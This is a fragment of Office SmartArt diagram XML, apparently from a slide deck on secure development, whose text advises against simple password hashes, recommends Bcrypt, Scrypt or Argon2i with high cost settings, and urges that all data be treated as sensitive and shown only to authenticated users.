    <dgm:cxn modelId="{B6F5C7D4-935D-470C-8975-2D3D265069B7}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{336373FA-96DC-45CF-96D9-9B7ED5B5108D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E0E9D83C-495A-4060-8318-2E6466FD6BCF}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{0EE91414-2112-49B8-B5DC-C4ADD66B72BC}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5133B05F-EF37-480E-B360-5A0342EB8153}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{95D10609-E99B-420D-86D9-12B6B2EB2665}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0A790198-FCD2-4902-89D8-04E554E20EFD}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{F118F2C7-FCCE-4536-8185-D30E81C3FD4F}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{98F00A1C-F590-4519-9CCB-CF3818DEFDF4}" type="presParOf" srcId="{20C32D41-18E1-464F-B6A2-7D7618DF22E0}" destId="{0DDA7A62-3E2C-4F2F-A0B5-01B80F6662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6F1775-16EF-418F-BFD4-55B2B4082D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FE8287-8CC5-4ECC-B1ED-63A49E6B911D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Store passwords Correctly!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{021942D8-9813-4EFF-9DC6-D6ED11EC0E57}" type="parTrans" cxnId="{7C9F8B4D-E60E-4F79-91C4-0200AC1292A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65D6FB42-4811-43FF-AE01-C7990D4201E9}" type="sibTrans" cxnId="{7C9F8B4D-E60E-4F79-91C4-0200AC1292A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24145518-2E1D-4AF0-BF1E-DCEC39CAC0B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Simple Hashes are not SAFE, </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D348AC8D-DE8D-47C2-BF65-EAFB37AF019B}" type="parTrans" cxnId="{2B556B86-8BB4-430B-BB42-5A2D0F966EA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA9C87A5-1F32-4E7B-A41B-985423D85C53}" type="sibTrans" cxnId="{2B556B86-8BB4-430B-BB42-5A2D0F966EA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B41BAC15-9835-48B3-A31A-5093D4CDE675}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Complex hashes ALONE are only slightly safer.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C495D08-E239-4683-924B-3280A6236BAC}" type="parTrans" cxnId="{0BBBF247-EA54-49BE-875E-55A1E54AAF2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AAF5B7B-16CD-4EC8-BFE2-F5C36F7134E9}" type="sibTrans" cxnId="{0BBBF247-EA54-49BE-875E-55A1E54AAF2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EBDA973-DAF5-4651-8B60-16FE3FBA5D6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>TO DO IT RIGHT: Bcrypt – time cost, Scrypt – time cost + memory cost, Argon2i – time cost + memory cost + parallelism degree</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D78EA4FF-C9E8-4A3D-9FDE-5636F15FE9CB}" type="parTrans" cxnId="{E37A4EB7-F945-41F3-B961-111200CB1C85}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{842512E8-0E0C-4009-9C6C-80F61E3F6596}" type="sibTrans" cxnId="{E37A4EB7-F945-41F3-B961-111200CB1C85}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB9BCB00-EFF3-4710-A9BE-021C56B4E64A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Make the work factor and memory cost as high as possible</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>(regardless of what you think you’ll never refactor)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5D3EAC6-81E7-41BF-97A2-9B592DF80472}" type="parTrans" cxnId="{8724448A-C18A-431B-992F-1A5C36D204AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D70AC4E4-9635-42C2-AA06-67AF341B5EBE}" type="sibTrans" cxnId="{8724448A-C18A-431B-992F-1A5C36D204AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" type="pres">
      <dgm:prSet presAssocID="{3F6F1775-16EF-418F-BFD4-55B2B4082DFA}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{348779D1-18B4-44B6-92E4-F29E33900EA9}" type="pres">
      <dgm:prSet presAssocID="{63FE8287-8CC5-4ECC-B1ED-63A49E6B91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83A9A6-CB0F-4966-9E23-7FC7130AF8FD}" type="pres">
      <dgm:prSet presAssocID="{65D6FB42-4811-43FF-AE01-C7990D4201E9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CDDD8533-5944-41B1-B1AD-4183A3510C23}" type="pres">
      <dgm:prSet presAssocID="{24145518-2E1D-4AF0-BF1E-DCEC39CAC0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A3859F-B552-43ED-800E-2C4386C97D4B}" type="pres">
      <dgm:prSet presAssocID="{CA9C87A5-1F32-4E7B-A41B-985423D85C53}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{08DD84D6-3B7C-44A3-AA30-01999F817B6E}" type="pres">
      <dgm:prSet presAssocID="{B41BAC15-9835-48B3-A31A-5093D4CDE6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D420876-7320-4729-A58C-7F707C9AE05A}" type="pres">
      <dgm:prSet presAssocID="{2AAF5B7B-16CD-4EC8-BFE2-F5C36F7134E9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F023892-9CD9-4B06-A38F-B0F44B684DE8}" type="pres">
      <dgm:prSet presAssocID="{7EBDA973-DAF5-4651-8B60-16FE3FBA5D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9B3D3B-DBF9-4A59-8641-81FE1BD55760}" type="pres">
      <dgm:prSet presAssocID="{842512E8-0E0C-4009-9C6C-80F61E3F6596}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{91177DA7-9738-4365-91FE-1D0043238E8B}" type="pres">
      <dgm:prSet presAssocID="{BB9BCB00-EFF3-4710-A9BE-021C56B4E64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BBF247-EA54-49BE-875E-55A1E54AAF2D}" srcId="{3F6F1775-16EF-418F-BFD4-55B2B4082DFA}" destId="{B41BAC15-9835-48B3-A31A-5093D4CDE675}" srcOrd="2" destOrd="0" parTransId="{5C495D08-E239-4683-924B-3280A6236BAC}" sibTransId="{2AAF5B7B-16CD-4EC8-BFE2-F5C36F7134E9}"/>
    <dgm:cxn modelId="{7C9F8B4D-E60E-4F79-91C4-0200AC1292A6}" srcId="{3F6F1775-16EF-418F-BFD4-55B2B4082DFA}" destId="{63FE8287-8CC5-4ECC-B1ED-63A49E6B911D}" srcOrd="0" destOrd="0" parTransId="{021942D8-9813-4EFF-9DC6-D6ED11EC0E57}" sibTransId="{65D6FB42-4811-43FF-AE01-C7990D4201E9}"/>
    <dgm:cxn modelId="{86708E4F-EF7F-40AF-A90C-DB7725EBD1EB}" type="presOf" srcId="{B41BAC15-9835-48B3-A31A-5093D4CDE675}" destId="{08DD84D6-3B7C-44A3-AA30-01999F817B6E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2B556B86-8BB4-430B-BB42-5A2D0F966EA7}" srcId="{3F6F1775-16EF-418F-BFD4-55B2B4082DFA}" destId="{24145518-2E1D-4AF0-BF1E-DCEC39CAC0B7}" srcOrd="1" destOrd="0" parTransId="{D348AC8D-DE8D-47C2-BF65-EAFB37AF019B}" sibTransId="{CA9C87A5-1F32-4E7B-A41B-985423D85C53}"/>
    <dgm:cxn modelId="{8724448A-C18A-431B-992F-1A5C36D204AA}" srcId="{3F6F1775-16EF-418F-BFD4-55B2B4082DFA}" destId="{BB9BCB00-EFF3-4710-A9BE-021C56B4E64A}" srcOrd="4" destOrd="0" parTransId="{E5D3EAC6-81E7-41BF-97A2-9B592DF80472}" sibTransId="{D70AC4E4-9635-42C2-AA06-67AF341B5EBE}"/>
    <dgm:cxn modelId="{6C0A708B-171D-4306-AF9B-34A7BEB46152}" type="presOf" srcId="{24145518-2E1D-4AF0-BF1E-DCEC39CAC0B7}" destId="{CDDD8533-5944-41B1-B1AD-4183A3510C23}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{CEDA34B1-A04B-4933-82F8-2BF0189ECF86}" type="presOf" srcId="{63FE8287-8CC5-4ECC-B1ED-63A49E6B911D}" destId="{348779D1-18B4-44B6-92E4-F29E33900EA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E37A4EB7-F945-41F3-B961-111200CB1C85}" srcId="{3F6F1775-16EF-418F-BFD4-55B2B4082DFA}" destId="{7EBDA973-DAF5-4651-8B60-16FE3FBA5D6C}" srcOrd="3" destOrd="0" parTransId="{D78EA4FF-C9E8-4A3D-9FDE-5636F15FE9CB}" sibTransId="{842512E8-0E0C-4009-9C6C-80F61E3F6596}"/>
    <dgm:cxn modelId="{5D227FBA-8B29-4DAA-8081-6215B9259383}" type="presOf" srcId="{BB9BCB00-EFF3-4710-A9BE-021C56B4E64A}" destId="{91177DA7-9738-4365-91FE-1D0043238E8B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{914454C1-028D-4D07-B1E4-5F9927F6A84C}" type="presOf" srcId="{7EBDA973-DAF5-4651-8B60-16FE3FBA5D6C}" destId="{6F023892-9CD9-4B06-A38F-B0F44B684DE8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DF2D47D9-03A5-4C83-A165-43A6961BEDA8}" type="presOf" srcId="{3F6F1775-16EF-418F-BFD4-55B2B4082DFA}" destId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{364820C7-DD01-4FED-9E52-712823E4A1AB}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{348779D1-18B4-44B6-92E4-F29E33900EA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E4F40412-BE8D-481F-B3B7-46709199A4E0}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{C183A9A6-CB0F-4966-9E23-7FC7130AF8FD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9B9855FB-8337-4F75-83DA-BC6890B0DBD2}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{CDDD8533-5944-41B1-B1AD-4183A3510C23}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{36C99F97-D702-4352-92D1-EF11DCDA5B18}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{D5A3859F-B552-43ED-800E-2C4386C97D4B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{109E8D13-5B4E-4BB8-88DA-ED2F3D0AB687}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{08DD84D6-3B7C-44A3-AA30-01999F817B6E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3EDED6B0-A89C-4BE6-9E8C-BF560022A20B}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{DD420876-7320-4729-A58C-7F707C9AE05A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E5600F98-E6B4-42E0-BE8B-4A1720865B6C}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{6F023892-9CD9-4B06-A38F-B0F44B684DE8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{013C9A56-3C48-4720-B8BD-43CDEDD23D4C}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{859B3D3B-DBF9-4A59-8641-81FE1BD55760}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{81878F57-E05D-4142-8D4E-143D28E565CD}" type="presParOf" srcId="{090D64B3-4880-4E87-A7EC-CD7FACADE6C0}" destId="{91177DA7-9738-4365-91FE-1D0043238E8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1E3A08-F2A2-4B19-B362-921604A5892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C0529-1E37-4FFD-9271-7B38F60DB0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Which data is sensitive? </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53DED318-2863-4E05-ACBE-FA05FD5EC37F}" type="parTrans" cxnId="{2A968EA0-FCE4-4CF1-8044-40E9DD04A391}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11075852-259D-4B9A-911B-ED61F04708D2}" type="sibTrans" cxnId="{2A968EA0-FCE4-4CF1-8044-40E9DD04A3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69F77C-428C-4476-B991-29D723BA75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(ALL OF IT!)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25C117E5-7C10-41E2-BB1F-38C29180B88A}" type="parTrans" cxnId="{EC47B4B7-C22E-4221-918A-8D6EC6FDC25D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5D69793-9841-4B31-9990-E7F8D371BA07}" type="sibTrans" cxnId="{EC47B4B7-C22E-4221-918A-8D6EC6FDC2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892046-3666-40DA-A25F-F5A80EA971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shouldn't expose ANYTHING regardless of data's classification type.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F6887AA-3F06-4F81-8C62-E38DC2954FB9}" type="parTrans" cxnId="{B6EBABA8-DB21-4501-ABA6-CB810758E710}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84A6369C-5CDA-42DE-AE5E-38C8FC4A9F55}" type="sibTrans" cxnId="{B6EBABA8-DB21-4501-ABA6-CB810758E7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8CAA62-FD52-48CD-8008-51024AEA4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authenticated users should be able to see any data</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{538C392D-0B15-4D6C-9628-7F287E9B6BCB}" type="parTrans" cxnId="{2DC46BFD-2920-4B9C-9C29-3ADA487768D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1931B97-5A31-4BDE-9326-F1304E751537}" type="sibTrans" cxnId="{2DC46BFD-2920-4B9C-9C29-3ADA487768D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04DBE115-D67C-40B4-9E63-93B43490B332}" type="pres">
      <dgm:prSet presAssocID="{CC1E3A08-F2A2-4B19-B362-921604A58920}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{95511A81-CDF3-4981-852C-B8CC6545F5DB}" type="pres">
      <dgm:prSet presAssocID="{CC1E3A08-F2A2-4B19-B362-921604A58920}" presName="container" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{91F0BD34-F067-41F5-BC50-F0A4B3271D11}" type="pres">
      <dgm:prSet presAssocID="{B3FC0529-1E37-4FFD-9271-7B38F60DB0CD}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A520F58-BDB2-460D-A6F9-E93D7041A391}" type="pres">
      <dgm:prSet presAssocID="{B3FC0529-1E37-4FFD-9271-7B38F60DB0CD}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56B9B7CC-C1E7-4187-8D17-F2BB0E1C5665}" type="pres">
      <dgm:prSet presAssocID="{B3FC0529-1E37-4FFD-9271-7B38F60DB0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2278DD-DD39-4849-B1F3-B47973A6DE72}" type="pres">
      <dgm:prSet presAssocID="{B3FC0529-1E37-4FFD-9271-7B38F60DB0CD}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7B42DF27-280B-447C-B43C-5AFC1C189908}" type="pres">
      <dgm:prSet presAssocID="{B3FC0529-1E37-4FFD-9271-7B38F60DB0CD}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C595CEF-D83A-4A2A-92A4-82F4AA3712F4}" type="pres">
      <dgm:prSet presAssocID="{11075852-259D-4B9A-911B-ED61F04708D2}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2CB7E81F-41AC-4607-A984-8AB1D2A52113}" type="pres">
      <dgm:prSet presAssocID="{2869F77C-428C-4476-B991-29D723BA7534}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5F164E8-A3ED-40AD-B4CB-492FBBE28CDD}" type="pres">
      <dgm:prSet presAssocID="{2869F77C-428C-4476-B991-29D723BA7534}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{092E29F1-4FB5-47FD-8FB1-AA94CDF9343C}" type="pres">
      <dgm:prSet presAssocID="{2869F77C-428C-4476-B991-29D723BA75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4942B489-5621-420D-801C-E2801787FEBF}" type="pres">
      <dgm:prSet presAssocID="{2869F77C-428C-4476-B991-29D723BA7534}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4E7121B5-E309-4FC5-A1E6-E12DBAC6E20E}" type="pres">
      <dgm:prSet presAssocID="{2869F77C-428C-4476-B991-29D723BA7534}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CD22E0E-E0E4-4081-94AC-F66715083E91}" type="pres">
      <dgm:prSet presAssocID="{E5D69793-9841-4B31-9990-E7F8D371BA07}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{04536504-2189-4D93-9C4F-516D22E39A57}" type="pres">
      <dgm:prSet presAssocID="{93892046-3666-40DA-A25F-F5A80EA97143}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0B888F6-5ADE-4950-AB0B-4F8213ABCE78}" type="pres">
      <dgm:prSet presAssocID="{93892046-3666-40DA-A25F-F5A80EA97143}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{848BB5F4-68C5-4426-931D-E08A337612CB}" type="pres">
      <dgm:prSet presAssocID="{93892046-3666-40DA-A25F-F5A80EA971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AD19034-94C9-4D0B-B043-A64E7CD6BA87}" type="pres">
      <dgm:prSet presAssocID="{93892046-3666-40DA-A25F-F5A80EA97143}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17B7B7B2-BD78-49C5-8A7B-92353BCA8FF9}" type="pres">
      <dgm:prSet presAssocID="{93892046-3666-40DA-A25F-F5A80EA97143}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0046A77-E0AC-46D8-8953-4C9275ABDFBB}" type="pres">
      <dgm:prSet presAssocID="{84A6369C-5CDA-42DE-AE5E-38C8FC4A9F55}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{321B01E6-F036-4714-9A51-0C260B732A55}" type="pres">
      <dgm:prSet presAssocID="{178CAA62-FD52-48CD-8008-51024AEA409C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3E76CF09-612A-439D-A40A-834D62BC5737}" type="pres">
      <dgm:prSet presAssocID="{178CAA62-FD52-48CD-8008-51024AEA409C}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7710A28-0DDB-4774-BCD6-68474ABDE7E5}" type="pres">
      <dgm:prSet presAssocID="{178CAA62-FD52-48CD-8008-51024AEA40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520385A-5B00-4D0F-B16D-FF7C810A9813}" type="pres">
      <dgm:prSet presAssocID="{178CAA62-FD52-48CD-8008-51024AEA409C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12AD53CD-B2B1-47E8-BD3B-884110030AB3}" type="pres">
      <dgm:prSet presAssocID="{178CAA62-FD52-48CD-8008-51024AEA40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3A3B03-DA9F-4FA2-ADDE-3877BF0CB6E5}" type="presOf" srcId="{B3FC0529-1E37-4FFD-9271-7B38F60DB0CD}" destId="{7B42DF27-280B-447C-B43C-5AFC1C189908}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{64123C11-FC60-4172-A8C3-0F9191A82795}" type="presOf" srcId="{178CAA62-FD52-48CD-8008-51024AEA409C}" destId="{12AD53CD-B2B1-47E8-BD3B-884110030AB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{B8FB7D63-171D-4600-B2A3-E5FD67450312}" type="presOf" srcId="{93892046-3666-40DA-A25F-F5A80EA97143}" destId="{17B7B7B2-BD78-49C5-8A7B-92353BCA8FF9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{CBC68C4C-D724-4345-ABF6-A62CA1DA9E09}" type="presOf" srcId="{84A6369C-5CDA-42DE-AE5E-38C8FC4A9F55}" destId="{A0046A77-E0AC-46D8-8953-4C9275ABDFBB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{5CC8EB6C-BEB1-4FEC-9A68-9F41481CBB29}" type="presOf" srcId="{2869F77C-428C-4476-B991-29D723BA7534}" destId="{4E7121B5-E309-4FC5-A1E6-E12DBAC6E20E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{32FFB470-D480-4028-AD0D-410BE711FE44}" type="presOf" srcId="{CC1E3A08-F2A2-4B19-B362-921604A58920}" destId="{04DBE115-D67C-40B4-9E63-93B43490B332}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{30BCE573-DCD9-45DA-BD17-4F1011F55B34}" type="presOf" srcId="{E5D69793-9841-4B31-9990-E7F8D371BA07}" destId="{5CD22E0E-E0E4-4081-94AC-F66715083E91}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconCircleList"/>
    <dgm:cxn modelId="{2A968EA0-FCE4-4CF1-8044-40E9DD04A391}" srcId="{CC1E3A08-F2A2-4B19-B362-921604A58920}" destId="{B3FC0529-1E37-4FFD-9271-7B38F60DB0CD}" srcOrd="0" destOrd="0" parTransId="{53DED318-2863-4E05-ACBE-FA05FD5EC37F}" sibTransId="{11075852-259D-4B9A-911B-ED61F04708D2}"/>
